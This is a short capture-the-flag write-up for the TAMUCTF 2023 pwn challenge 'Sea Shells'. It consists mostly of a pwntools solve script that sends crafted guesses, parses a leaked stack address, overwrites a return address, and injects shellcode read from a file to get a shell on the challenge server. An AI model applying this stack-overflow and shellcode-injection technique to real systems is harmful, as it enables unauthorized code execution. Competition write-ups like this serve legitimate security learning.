Sea Shells
05/04/2023
By: unvariant
Tags: pwn TAMUCTF-2023Problem Description:
Sally sold some seashells by the seashore. Try to guess how many she sold, I bet you will never be able to!
Hints:
Reveal Hints
NoneSolve script
from pwn import *
file = ELF("./sea-shells")
p = remote("tamuctf.com", 443, ssl=True, sni="sea-shells")
p.recvuntil(b"It's not that easy though, enter 4 numbers to use to guess!\n")
p.sendline(str(0).encode())
p.sendline(str(0).encode())
p.sendline(str(0).encode())
p.sendline(str(17767).encode())
p.recvuntil(b"hard work: ")
leak = int(p.recvline().decode().strip(), 16)
print(f"leak: {leak:x}")
attack = b"A" * 17
attack += p64(leak + 0x30 + 0x10)
shellcode = open("attack.bin", "rb").read()
for byte in shellcode:
assert(byte != 0x20 and byte != 0x0a and byte != 0x00)
attack += shellcode
p.sendline(attack)
p.interactive()